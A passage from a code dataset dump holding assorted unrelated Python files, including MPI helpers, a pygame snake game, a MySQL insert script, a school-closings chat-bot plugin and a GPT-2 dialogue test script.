source, tag) -> None:\n \"\"\"receive data from another MPI node\n\n Args:\n data: A buffer into which the received data is written\n dest (int): The ID of the sending node\n tag (int): A numeric tag identifying the message\n\n \"\"\"\n status = numba_mpi.recv(data, source, tag)\n assert status == 0\n\n\n@register_jitable\ndef _allreduce(sendobj, recvobj, operator: Union[int, \"Operator\", None] = None) -> int:\n \"\"\"helper function that calls `numba_mpi.allreduce`\"\"\"\n if operator is None:\n return numba_mpi.allreduce(sendobj, recvobj) # type: ignore\n else:\n return numba_mpi.allreduce(sendobj, recvobj, operator) # type: ignore\n\n\ndef mpi_allreduce(data, operator: Union[int, \"Operator\", None] = None):\n \"\"\"combines data from all MPI nodes\n\n Note that complex datatypes and user-defined functions are not properly supported.\n\n Args:\n data:\n Data being send from this node to all others\n operator:\n The operator used to combine all data. Possible options are summarized in\n the IntEnum :class:`numba_mpi.Operator`.\n\n Returns:\n The accumulated data\n \"\"\"\n from mpi4py import MPI\n\n if isinstance(data, Number):\n # reduce a single number\n sendobj = np.array([data])\n recvobj = np.empty((1,), sendobj.dtype)\n status = _allreduce(sendobj, recvobj, operator)\n if status != 0:\n raise MPI.Exception(status)\n return recvobj[0]\n\n elif isinstance(data, np.ndarray):\n # reduce an array\n recvobj = np.empty(data.shape, data.dtype)\n status = _allreduce(data, recvobj, operator)\n if status != 0:\n raise MPI.Exception(status)\n return recvobj\n\n else:\n raise TypeError(f\"Unsupported type {data.__class__.__name__}\")\n\n\n@overload(mpi_allreduce)\ndef ol_mpi_allreduce(data, operator: Union[int, \"Operator\", None] = None):\n \"\"\"overload the `mpi_allreduce` function\"\"\"\n\n if isinstance(data, types.Number):\n\n def impl(data, operator=None):\n \"\"\"reduce a single number across all cores\"\"\"\n sendobj = np.array([data])\n recvobj = np.empty((1,), sendobj.dtype)\n status = _allreduce(sendobj, recvobj, operator)\n assert status == 0\n return recvobj[0]\n\n elif isinstance(data, types.Array):\n\n def impl(data, operator=None):\n \"\"\"reduce an array across all cores\"\"\"\n recvobj = np.empty(data.shape, data.dtype)\n status = _allreduce(data, recvobj, operator)\n assert status == 0\n return recvobj\n\n else:\n raise TypeError(f\"Unsupported type {data.__class__.__name__}\")\n\n return impl\n","sub_path":"pde/tools/mpi.py","file_name":"mpi.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"505506156","text":"from abc import abstractmethod\n\nimport numpy as np\n\n\nclass Survival:\n \"\"\"\n The survival process is implemented inheriting from this class, which selects from a population only\n specific individuals to survive.\n \"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n\n def do(self, pop, n_survive, **kwargs):\n self._do(pop, n_survive, **kwargs)\n\n @abstractmethod\n def _do(self, pop, n_survive, **kwargs):\n pass\n\n\ndef split_by_feasibility(pop, sort_infeasbible_by_cv=True):\n # if no constraint violation is provided\n if pop.CV is None:\n return np.arange(pop.size()), np.array([])\n\n feasible, infeasible = [], []\n\n for i in range(pop.size()):\n if pop.CV[i, 0] <= 0:\n feasible.append(i)\n else:\n infeasible.append(i)\n\n if sort_infeasbible_by_cv:\n infeasible = sorted(infeasible, key=lambda i: pop.CV[i,:])\n\n return np.array(feasible), np.array(infeasible)\n","sub_path":"pymoo/model/survival.py","file_name":"survival.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"533529482","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of INSPIRE.\n# Copyright (C) 2016 CERN.\n#\n# INSPIRE is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License as\n# published by the Free Software Foundation; either version 2 of the\n# License, or (at your option) any later version.\n#\n# INSPIRE is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with INSPIRE; if not, write to the Free Software Foundation, Inc.,\n# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.\n#\n# In applying this licence, CERN does not waive the privileges and immunities\n# granted to it by virtue of its status as an Intergovernmental Organization\n# or submit itself to any jurisdiction.\n\n\"\"\"Search factory for INSPIRE workflows UI.\n\nWe specify in this custom search factory which fields elasticsearch should\nreturn in order to not always return the entire record.\n\nAdd a key path to the includes variable to include it in the API output when\nlisting/searching across workflow objects (Holding Pen).\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\nfrom invenio_workflows_ui.search import default_search_factory\n\n\ndef holdingpen_search_factory(self, search, **kwargs):\n \"\"\"Override search factory.\"\"\"\n search, urlkwargs = default_search_factory(self, search, **kwargs)\n includes = [\n 'metadata.titles', 'metadata.abstracts', 'metadata.field_categories',\n 'metadata.authors', 'metadata.name', 'metadata.positions', 'metadata.acquisition_source',\n 'metadata.field_categories', '_workflow', '_extra_data.relevance_prediction',\n '_extra_data.user_action',\n '_extra_data.classifier_results.complete_output'\n ]\n search = search.extra(_source={\"include\": includes})\n return search, urlkwargs\n","sub_path":"inspirehep/modules/workflows/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"636373505","text":"#!/usr/bin/env python3\n\nimport multiprocessing as mp\n\n\ndef addTwoNumbers(a, b, q):\n # time.sleep(5) # In case you want to slow things down to see what is happening.\n q.put(a+b)\n\n\ndef addTwoPar():\n x = int(input(\"Enter first number: \"))\n y = int(input(\"Enter second number: \"))\n\n q = mp.Queue()\n p1 = mp.Process(target=addTwoNumbers, args=(x, y, q))\n p2 = mp.Process(target=addTwoNumbers, args=(x, y, q))\n p1.start()\n p2.start()\n result1 = q.get()\n result2 = q.get()\n print(result1+result2)\n\n\ndef main():\n addTwoPar()\n\n\nif __name__ == '__main__':\n main()","sub_path":"year2_1819/operating_systems/labs/lab2_multiprocessing/add_two_nums.py","file_name":"add_two_nums.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"550956923","text":"##\n## Programación en Python\n## ===========================================================================\n##\n## Genere una lista de tuplas, donde cada tupla contiene en la primera \n## posicion, el valor de la segunda columna; la segunda parte de la \n## tupla es una lista con las letras (ordenadas y sin repetir letra) \n## de la primera columna que aparecen asociadas a dicho valor de la \n## segunda columna. Esto es:\n##\n## Rta/\n## ('0', ['C'])\n## ('1', ['A', 'B', 'D', 'E'])\n## ('2', ['A', 'D', 'E'])\n## ('3', ['A', 'B', 'D', 'E'])\n## ('4', ['B', 'E'])\n## ('5', ['B', 'C', 'D', 'E'])\n## ('6', ['A', 'B', 'C', 'E'])\n## ('7', ['A', 'C', 'D', 'E'])\n## ('8', ['A', 'B', 'E'])\n## ('9', ['A', 'B', 'C', 'E'])\n##\n## >>> Escriba su codigo a partir de este punto <<<\n##\nimport csv\nwith open('data.csv', 'r') as file:\n text = csv.reader(file, delimiter=',')\n lista = [] \n for row in text:\n lista.append(row[0])\ntext = [i.split('\\t') for i in lista]\ndicc = {}\nfor elemento in text:\n if elemento[1] in dicc.keys():\n if elemento[0] not in dicc[elemento[1]]:\n dicc[elemento[1]].append(elemento[0])\n else:\n dicc[elemento[1]] = [elemento[0]]\n##dic1={text:sorted(dicc[text]) for text in dicc.keys()}\narreglo = sorted(dicc, key=str.lower)\nfor i in arreglo:\n print((i,(sorted(dicc[i]))))","sub_path":"03-python=1/q08=1/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"548838603","text":"#**第 0002 题**:将 0001 题生成的 200 个激活码(或者优惠券)保存到 **MySQL** 关系型数据库中。\n\nimport pymysql.cursors\n\n\ndef store_mysql(filepath):\n connection = pymysql.connect(host=\"localhost\", user=\"root\", password=\"1234\", db=\"show_me_the_code\")\n\n try:\n with connection.cursor() as cursor:\n # 判断表是否存在\n cursor.execute('show tables')\n tables = cursor.fetchall()\n findtables = False\n for table in tables:\n if 'code' in table:\n findtables = True\n print(\"the table is already exist\")\n if not findtables:\n cursor.execute('''\n CREATE TABLE code(\n id INT NOT NULL AUTO_INCREMENT,\n code VARCHAR(20) NOT NULL,\n PRIMARY KEY (id));\n ''')\n\n with open(filepath, 'rb') as f:\n for line in f.readlines():\n code = line.strip() # 用strip把\\n去掉\n cursor.execute(\"INSERT INTO code (code) VALUES (%s);\", code)\n\n connection.commit()\n finally:\n connection.close()\n\n\nif __name__ == '__main__':\n store_mysql('code-result.txt')\n","sub_path":"python-learn/show-me-the-code/0002-save-to-mysql.py","file_name":"0002-save-to-mysql.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"351653619","text":"# Teknath krishna jha \n# Walchand college of engineering sangli\n# CSE\n# All dimensions are taken as per poco f1 \n\n# Basic window setup \n# part 1\n\nimport pygame \nimport time \nimport random\n\n# initializing pygame\npygame.init()\n\n# colors\nblack = (0,0,0)\nwhite = (255,255,255)\nred = (255,0,0)\ngreen = (0,255,0)\nblue = (0,0,255)\nyellow = (255,255,0)\n\n# window surface size \nwidth=90\nwindow_width =1080\n\nwindow_height =1500\n\n\n\n\ngameDisplay = pygame.display.set_mode((window_width , window_height))\n\n\n# window name \npygame.display.set_caption('$n@ke g@me Teknath jha')\n\n# text font \nfont = pygame.font.SysFont(None , 25 , bold=True)\n\n# on quit \ndef myquit():\n\tpygame.quit()\n\tsys.exit()\n\nclock = pygame.time.Clock()\nFPS = 5\nblockSize = 50\nnoPixel = 0\n\n'''\nsizeGrd = window_width // blockSize\nrow = 0\ncol = 0\nfor nextline in range(sizeGrd):\n'''\n\n# part 2\n# function to each block of draw snake\ndef snake(blockSize, snakelist):\n\n #x = 250 - (segment_width + segment_margin) * i\n i=1\n\n for size in snakelist:\n if i==1:\n i=0\n pygame.draw.rect(gameDisplay, blue ,[size[0]+5,size[1],blockSize,blockSize],100)\n else:\n i=1\n pygame.draw.rect(gameDisplay, black ,[size[0]+5,size[1],blockSize,blockSize])\n \n\ndef message_to_screen(msg, color):\n # render bold text background is cyan\n screen_text = font.render(msg, True, 'red' ,'cyan')\n # position of text on surface \n gameDisplay.blit(screen_text, [((window_width)/2)-350, ((window_height)/2) -50])\n\n # part 3\ndef gameLoop():\n\n # game status\n\n\n gameExit = False\n gameOver = False\n\n lead_x = (window_width+width)/2\n lead_y = (window_height+width)/2\n\n change_pixels_of_x = 0\n change_pixels_of_y = 0\n \n # Initial snake dimension\n snakelist = []\n snakeLength = 1\n\n # food position\n # round for round off values for integer \n randomAppleX = round(random.randrange(0, (window_width-width)-blockSize)/10.0)*10.0\n randomAppleY = round(random.randrange(0, (window_height-width)-blockSize)/10.0)*10.0\n\n\n while not gameExit:\n # Execution of below while loop when game will over\n while gameOver == True:\n gameDisplay.fill(white)\n message_to_screen(\"Game over, press c to play again or Q to quit\", red)\n pygame.display.update()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n gameOver = False\n gameExit = True\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_q:\n gameExit = True\n gameOver = False\n if event.key == pygame.K_c:\n gameLoop()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n gameExit = True\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n myquit()\n\n # windows\n # leftArrow = event.key == pygame.K_LEFT\n # rightArrow = event.key == pygame.K_RIGHT\n # upArrow = event.key == pygame.K_UP\n # downArrow = event.key == pygame.K_DOWN\n\n\n # Androids\n leftArrow = event.key == pygame.K_4 \n rightArrow = event.key ==pygame.K_6 \n upArrow = event.key == pygame.K_2 \n downArrow = event.key == pygame.K_8 \n # for user speed self exceeding \n # speed = event.key == pygame.K_5 \n\n #Reduce and exceed from opposite ends as per instructions as left ,right, up , down \n if leftArrow:\n change_pixels_of_x = -blockSize\n change_pixels_of_y = noPixel\n elif rightArrow:\n change_pixels_of_x = blockSize\n change_pixels_of_y = noPixel\n elif upArrow:\n change_pixels_of_y = -blockSize\n change_pixels_of_x = noPixel\n elif downArrow:\n change_pixels_of_y = blockSize\n change_pixels_of_x = noPixel\n\n if lead_x >= (window_width-width) or lead_x < 0+width or lead_y >= (window_height-width) or lead_y < 0+width:\n gameOver = True\n\n lead_x += change_pixels_of_x\n lead_y += change_pixels_of_y\n\n gameDisplay.fill('cyan')\n\n\n AppleThickness = 50\n # About food position and size in terminal in back-end\n print([int(randomAppleX),int(randomAppleY),AppleThickness,AppleThickness])\n pygame.draw.rect(gameDisplay, red, [randomAppleX,randomAppleY,AppleThickness,AppleThickness])\n\n allspriteslist = []\n allspriteslist.append(lead_x)\n allspriteslist.append(lead_y)\n snakelist.append(allspriteslist)\n\n if len(snakelist) > snakeLength:\n del snakelist[0]\n\n for eachSegment in snakelist [:-1]:\n if eachSegment == allspriteslist:\n gameOver = True\n\n snake(blockSize, snakelist)\n\n# border \n # left most \n pygame.draw.rect(gameDisplay,yellow,[0,0,width,window_height])\n # right most \n pygame.draw.rect(gameDisplay,yellow,[window_width-width,0,width,window_height])\n # bottom most\n pygame.draw.rect(gameDisplay,yellow,[0,window_height-width,window_width,width])\n # top most \n pygame.draw.rect(gameDisplay,yellow,[0,0,window_width,width])\n\n\n pygame.display.update() \n\n# Comparision of food and snake mouth position \n if lead_x >= (randomAppleX - AppleThickness) and lead_x <= (randomAppleX + AppleThickness-2):\n\n if lead_y >= (randomAppleY - AppleThickness) and lead_y <= (randomAppleY + AppleThickness-2):\n\n randomAppleX = round(random.randrange(0+width, (window_width-width)-blockSize)/10.0)*10.0\n\n randomAppleY = round(random.randrange(0+width, (window_height-width)-blockSize)/10.0)*10.0\n # finally snake ate food \n snakeLength += 1 \n\n# Frames per second here it is 5fps\n\n clock.tick(FPS)\n\n pygame.quit()\n quit()\n\n# Calling \n\ngameLoop()\n\n","sub_path":"computer snake game.py","file_name":"computer snake game.py","file_ext":"py","file_size_in_byte":6255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"455474913","text":"import plugins\nimport json\nfrom requests import get\nfrom control import *\nfrom bs4 import BeautifulSoup\n\n\ndef _initialise():\n plugins.register_user_command(['fcps', 'lcps'])\n\n\ndef lcps(bot, event, *args):\n '''This command checks for school closings in the Loudon County Public Schools area. Data taken from NBC.'''\n try:\n r = get('http://www.nbcwashington.com/weather/school-closings/')\n html = r.text\n soup = BeautifulSoup(html, 'html.parser')\n schools = []\n for school in soup.find_all('p'):\n schools.append(school.text)\n\n for i in range(len(schools)):\n if 'Loudoun County' in schools[i]:\n check = str(schools[i])\n status = check.replace('Loudoun County Schools', '')\n msg = _('LCPS is {}').format(status)\n yield from bot.coro_send_message(event.conv, msg)\n except BaseException as e:\n simple = _('An Error Occurred')\n msg = _('{} -- {}').format(str(e), event.text)\n yield from bot.coro_send_message(event.conv, simple)\n yield from bot.coro_send_message(CONTROL, msg)\n\n\ndef fcps(bot, event, *args):\n '''This command checks for closings in the Fairfax County Public Schools Area. Data taken from TJHSST.'''\n try:\n page = get('https://ion.tjhsst.edu/api/emerg?format=json')\n data = json.loads(page.text)\n status = data['status']\n if status:\n message = data['message']\n message = message.replace('
', '')\n message = message.replace('
', '')\n msg = _(message)\n else:\n msg = _('FCPS is open')\n yield from bot.coro_send_message(event.conv, msg)\n except BaseException as e:\n simple = _('An Error Occurred')\n msg = _('{} -- {}').format(str(e), event.text)\n yield from bot.coro_send_message(event.conv, simple)\n yield from bot.coro_send_message(CONTROL, msg)\n","sub_path":"hangupsbot/plugins/closings.py","file_name":"closings.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"359186071","text":"VERSION = \"1.0.0\"\n\n\"\"\" Hämta skärmupplösning \"\"\"\nimport tkinter\nscreen = tkinter.Tk()\nscreen.withdraw()\nSCREEN_WIDTH = screen.winfo_screenwidth()\nSCREEN_HEIGHT = screen.winfo_screenheight()\nFULLSCREEN = True\nDIAGNOSE_FISH = False\nSKIP_MAIN_MENU = False\nSPLASH_IMAGE = \"assets/images/splash/splash.png\"\n\n\"\"\" Bakgrundsbild \"\"\"\nBACKGROUND_IMAGE = \"assets/images/background.jpg\"\nSAND_RATIO = 0.2 # Andel av skärmen täckt av sandbotten\n\nTICK_RATE = 60\n\n\"\"\" Egenskaper för morötterna \"\"\"\nSPRITE_SCALING_CARROT = 0.25\ncarrot_food_value = 1000\ncarrot_frequency = 1\n\n\"\"\" Egenskaper för kroken \"\"\"\nSPRITE_SCALING_FISH_HOOK = 0.15\n\n\"\"\" Egenskaper för popcorn \"\"\"\nSPRITE_SCALING_POPCORN = 0.05\npopcorn_food_value = 500\n\n\"\"\" Egenskaper för blåbär \"\"\"\nSPRITE_SCALING_BLUEBERRY = 0.2\nblueberry_food_value = 500\n\n\"\"\" Egenskaper för blåbärsplantan \"\"\"\nPLANT_BLUEBERRY_NUMBER = 5\nSPRITE_SCALING_PLANT_BLUEBERRY = 0.1\nplant_blueberry_grow_rate = 1\n\n\"\"\" Egenskaper för förgrundsplantan \"\"\"\nPLANT_FOREGROUND_NUMBER = 5\nSPRITE_SCALING_PLANT_FOREGROUND = 0.6\n\n\"\"\" Egenskaper för fiskägg \"\"\"\nSCALING_FISH_EGG = 0.15\nfish_egg_hatch_age = 1000\nfish_egg_disapear_age = 1500\n\n\"\"\" Egenskaper för bubbelkartor \"\"\"\nBUBBLE_MAPS = 5 # Antalet bubbelkartor att generera\n\n\"\"\" Egenskaper för muspekaren \"\"\"\nSCALING_POINTER = 0.08\n\n\"\"\"\nImportera debug1.py om den existerar\nFilen spåras inte av repo utan är lokal\nHa kvar längst ner, ifall den skriver över några vars\n\"\"\"\ntry:\n from debug import *\n DEBUG = True\nexcept:\n DEBUG = False\n","sub_path":"vars.py","file_name":"vars.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"348394314","text":"import transformers\nimport torch\nimport os\nimport json\nimport random\nimport numpy as np\nimport argparse\nfrom datetime import datetime\nfrom tqdm import tqdm\nfrom torch.nn import DataParallel\nimport logging\nfrom transformers.modeling_gpt2 import GPT2Config, GPT2LMHeadModel\nfrom transformers import BertTokenizer\nfrom os.path import join, exists\nfrom itertools import zip_longest, chain\n# from chatbot.model import DialogueGPT2Model\nfrom dataset import MyDataset\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.nn import CrossEntropyLoss\nfrom sklearn.model_selection import train_test_split\nfrom train import create_model\nimport torch.nn.functional as F\nimport codecs\nimport json\nPAD = '[PAD]'\npad_id = 0\n\nPAD = '[PAD]'\npad_id = 0\nlogger = None\nname_map_aspect = {\"电影名\": \"moviename\",\"导演\": \"director\",\"演员名\":\"actor\", \"类型\":\"movie_type\" ,\"国家\":\"country\" ,\"上映时间\":\"time\" , \"角色\":\"role\",\"剧情\":\"plot\",\"台词\":\"lines\",\"奖项\":\"award\" ,\n \"票房\":\"income\",\"评分\":\"rating\",\"资源\":\"website\", \"音乐\":\"music\", \"其他\":\"aspect_others\"}\nname_map_action ={\"请求事实\":\"request_fact\", \"请求推荐\":\"request_rec\",\"请求感受\":\"request_feeling\",\"告知事实\":\"inform_fact\",\"告知推荐\":\"inform_rec\",\"告知感受\":\"inform_feeling\",\"其他\":\"others\"}\n\nSPECIAL_TOKENS = {\n\"start_context\" : \"[context]\",\n\"end_context\" : \"[endofcontext]\",\n\"start_action\" : \"[action]\",\n\"end_action\" : \"[endofaction]\",\n\"start_know\": \"[knowledge]\",\n\"end_know\": \"[endofknowledge]\",\n\"start_response\":\"[response]\",\n\"end_response\":\"[endofresponse]\",\n\"user\":\"[user]\",\n\"system\": \"[system]\",\n}\nroot=\"/apdcephfs/share_47076/aaronsu/GPT2-movie-chat-0715-01/\"\n\ndef setup_train_args():\n \"\"\"\n 设置训练参数\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--device', default='0,1,2,3', type=str, required=False, help='设置使用哪些显卡')\n parser.add_argument('--no_cuda', action='store_true', help='不使用GPU进行训练')\n parser.add_argument('--model_config', default=root+'config/model_config_dialogue_small.json', type=str, required=False,\n help='选择模型参数')\n parser.add_argument('--vocab_path', default=root+'vocabulary/vocab_small.txt', type=str, required=False, help='选择词库')\n parser.add_argument('--train_raw_path', default=root+'new_data/train.txt', type=str, required=False, help='原始训练语料')\n parser.add_argument('--valid_tokenized_path', default=root+'movie_data/valid_tokenized.txt', type=str,\n required=False,\n help='将原始训练预料tokenize之后的数据的存放位置')\n parser.add_argument('--log_path', default=root+'test.log', type=str, required=False, help='训练日志存放位置')\n parser.add_argument('--raw', action='store_true', help='是否对原始训练语料做tokenize。若尚未对原始训练语料进行tokenize,则指定该参数')\n parser.add_argument('--epochs', default=10, type=int, required=False, help='训练的轮次')\n parser.add_argument('--batch_size', default=8, type=int, required=False, help='训练batch size')\n parser.add_argument('--lr', default=1e-5, type=float, required=False, help='学习率')\n parser.add_argument('--warmup_steps', default=20000, type=int, required=False, help='warm up步数')\n parser.add_argument('--log_step', default=100, type=int, required=False, help='多少步汇报一次loss')\n parser.add_argument('--gradient_accumulation', default=1, type=int, required=False, help='梯度积累')\n parser.add_argument('--max_grad_norm', default=1.0, type=float, required=False)\n parser.add_argument('--model_path', default=root+ 'ul_model_best/model_epoch10/pytorch_model.bin', type=str, required=False, help='预训练的GPT2模型的路径')\n parser.add_argument('--writer_dir', default=root+'tensorboard_summary/', type=str, required=False, help='Tensorboard路径')\n parser.add_argument('--seed', type=int, default=None, help='设置种子用于生成随机数,以使得训练的结果是确定的')\n parser.add_argument('--num_workers', type=int, default=1, help=\"dataloader加载数据时使用的线程数量\")\n # parser.add_argument('--max_len', type=int, default=60, help='每个utterance的最大长度,超过指定长度则进行截断')\n # parser.add_argument('--max_history_len', type=int, default=4, help=\"dialogue history的最大长度\")\n parser.add_argument('--temperature', default=1, type=float, required=False, help='生成的temperature')\n parser.add_argument('--topk', default=8, type=int, required=False, help='最高k选1')\n parser.add_argument('--topp', default=0, type=float, required=False, help='最高积累概率')\n parser.add_argument('--repetition_penalty', default=1.3, type=float, required=False,\n help=\"重复惩罚参数,若生成的对话重复性较高,可适当提高该参数\")\n parser.add_argument('--max_len', type=int, default=50, help='每个utterance的最大长度,超过指定长度则进行截断')\n parser.add_argument('--max_history_len', type=int, default=5, help=\"dialogue history的最大长度\")\n return parser.parse_args()\n\n\n\n\n\n\ndef create_logger(args):\n \"\"\"\n 将日志输出到日志文件和控制台\n \"\"\"\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.INFO)\n\n formatter = logging.Formatter(\n '%(asctime)s - %(levelname)s - %(message)s')\n\n # 创建一个handler,用于写入日志文件\n file_handler = logging.FileHandler(\n filename=args.log_path)\n file_handler.setFormatter(formatter)\n file_handler.setLevel(logging.INFO)\n logger.addHandler(file_handler)\n\n # 创建一个handler,用于将日志输出到控制台\n console = logging.StreamHandler()\n console.setLevel(logging.DEBUG)\n console.setFormatter(formatter)\n logger.addHandler(console)\n\n return logger\n\n\ndef top_k_top_p_filtering(logits, top_k=0, top_p=0.0, filter_value=-float('Inf')):\n \"\"\" Filter a distribution of logits using top-k and/or nucleus (top-p) filtering\n Args:\n logits: logits distribution shape (vocabulary size)\n top_k > 0: keep only top k tokens with highest probability (top-k filtering).\n top_p > 0.0: keep the top tokens with cumulative probability >= top_p (nucleus filtering).\n Nucleus filtering is described in Holtzman et al. (http://arxiv.org/abs/1904.09751)\n From: https://gist.github.com/thomwolf/1a5a29f6962089e871b94cbd09daf317\n \"\"\"\n assert logits.dim() == 1 # batch size 1 for now - could be updated for more but the code would be less clear\n top_k = min(top_k, logits.size(-1)) # Safety check\n if top_k > 0:\n # Remove all tokens with a probability less than the last token of the top-k\n # torch.topk()返回最后一维最大的top_k个元素,返回值为二维(values,indices)\n # ...表示其他维度由计算机自行推断\n indices_to_remove = logits < torch.topk(logits, top_k)[0][..., -1, None]\n logits[indices_to_remove] = filter_value # 对于topk之外的其他元素的logits值设为负无穷\n\n if top_p > 0.0:\n sorted_logits, sorted_indices = torch.sort(logits, descending=True) # 对logits进行递减排序\n cumulative_probs = torch.cumsum(F.softmax(sorted_logits, dim=-1), dim=-1)\n\n # Remove tokens with cumulative probability above the threshold\n sorted_indices_to_remove = cumulative_probs > top_p\n # Shift the indices to the right to keep also the first token above the threshold\n sorted_indices_to_remove[..., 1:] = sorted_indices_to_remove[..., :-1].clone()\n sorted_indices_to_remove[..., 0] = 0\n\n indices_to_remove = sorted_indices[sorted_indices_to_remove]\n logits[indices_to_remove] = filter_value\n return logits\n\n\ndef main():\n args = setup_train_args()\n logger = create_logger(args)\n # 当用户使用GPU,并且GPU可用时\n args.cuda = torch.cuda.is_available() and not args.no_cuda\n device = 'cuda' if args.cuda else 'cpu'\n logger.info('using device:{}'.format(device))\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.device\n tokenizer = BertTokenizer(vocab_file=args.vocab_path)\n tokenizer.add_tokens([i for i in SPECIAL_TOKENS.values()])\n tokenizer.add_tokens([i for i in name_map_aspect.values()])\n tokenizer.add_tokens([i for i in name_map_action.values()])\n \n config = GPT2Config.from_pretrained(root+ \"ul_model_best/model_epoch8/config.json\")\n\n model = GPT2LMHeadModel.from_pretrained(args.model_path, config=config)\n model.to(device)\n model.eval()\n # print('开始和chatbot聊天,输入CTRL + Z以退出')\n response = []\n with open(args.valid_tokenized_path, \"r\", encoding=\"utf8\") as f:\n data = f.read()\n data_list = data.split(\"\\n\")\n train_list, test_list = train_test_split(data_list, test_size=0.2, random_state=1) \n test_dataset = MyDataset(test_list)\n with codecs.open(root+\"cxt_response.txt\", \"w\", \"utf-8\") as fout:\n \tfor test_i in test_list[:500]:\n input_ids = [int(token_id) for token_id in test_i.split(\"13323\")[0].split()] \n # 13323 is startofresponse, 13324 is endofresponse\n if len(input_ids) > 200: \n continue\n curr_input_tensor = torch.tensor(input_ids).long().to(device)\n generated = []\n # 最多生成max_len个token\n for _ in range(args.max_len):\n outputs = model(input_ids=curr_input_tensor)\n next_token_logits = outputs[0][-1, :]\n # 对于已生成的结果generated中的每个token添加一个重复惩罚项,降低其生成概率\n for id in set(generated):\n next_token_logits[id] /= args.repetition_penalty\n next_token_logits = next_token_logits / args.temperature\n # 对于[UNK]的概率设为无穷小,也就是说模型的预测结果不可能是[UNK]这个token\n next_token_logits[tokenizer.convert_tokens_to_ids('[UNK]')] = -float('Inf')\n filtered_logits = top_k_top_p_filtering(next_token_logits, top_k=6, top_p=0)\n # torch.multinomial表示从候选集合中无放回地进行抽取num_samples个元素,权重越高,抽到的几率越高,返回元素的下标\n next_token = torch.multinomial(F.softmax(filtered_logits, dim=-1), num_samples=1)\n if next_token == 13324: # 遇到[SEP]则表明response生成结束\n break\n generated.append(next_token.item())\n curr_input_tensor = torch.cat((curr_input_tensor, next_token), dim=0)\n # his_text = tokenizer.convert_ids_to_tokens(curr_input_tensor.tolist())\n # print(\"his_text:{}\".format(his_text))\n text = tokenizer.convert_ids_to_tokens(generated)\n context = tokenizer.convert_ids_to_tokens(input_ids)\n golden = tokenizer.convert_ids_to_tokens([int(token_id) for token_id in test_i.split(\"13323\")[1].split()])\n fout.write(\"\".join(context)+\"\\n\")\n fout.write(\"\".join(golden)+\"\\n\")\n fout.write(\"\".join(text)+\"\\n\\n\")\n \n\n\nif __name__ == '__main__':\n main()\n","sub_path":"k_cxt_test.py","file_name":"k_cxt_test.py","file_ext":"py","file_size_in_byte":11353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"480533957","text":"\n\n#calss header\nclass _PERHAPS():\n\tdef __init__(self,): \n\t\tself.name = \"PERHAPS\"\n\t\tself.definitions = [u'used to show that something is possible or that you are not certain about something: ', u'used to show that a number or amount is approximate: ', u'used when making polite requests or statements of opinion: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adverbs'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adverbs/_perhaps.py","file_name":"_perhaps.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"477387053","text":"#!/usr/bin/env python3\nimport numpy as np\nimport random\nimport argparse\nfrom keras.models import model_from_json, Model\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.optimizers import Adam\nimport tensorflow as tf\nimport json\n\nfrom ReplayBuffer import ReplayBuffer\nfrom ActorNetwork import ActorNetwork\nfrom CriticNetwork import CriticNetwork\nfrom OU import OU\nimport ABPipe\nimport timeit\n\nOU = OU() # Ornstein-Uhlenbeck Process\n\n\ndef playGame(train_indicator=1, runGame=1, resume=True, client_number=1): # 1 means Train, 0 means simply Run\n BUFFER_SIZE = 10000\n BATCH_SIZE = 8\n GAMMA = 0.8\n TAU = 0.01 # Target Network HyperParameters\n LRA = 1e-6 # Learning rate for Actor\n LRC = 1e-5 # Lerning rate for Critic\n\n action_dim = 2 # X, Y cordinate\n state_dim = 2000 # The encoding length of the game state\n\n np.random.seed(993)\n\n EXPLORE = 1000.\n training_steps = 1000\n reward = 0\n done = 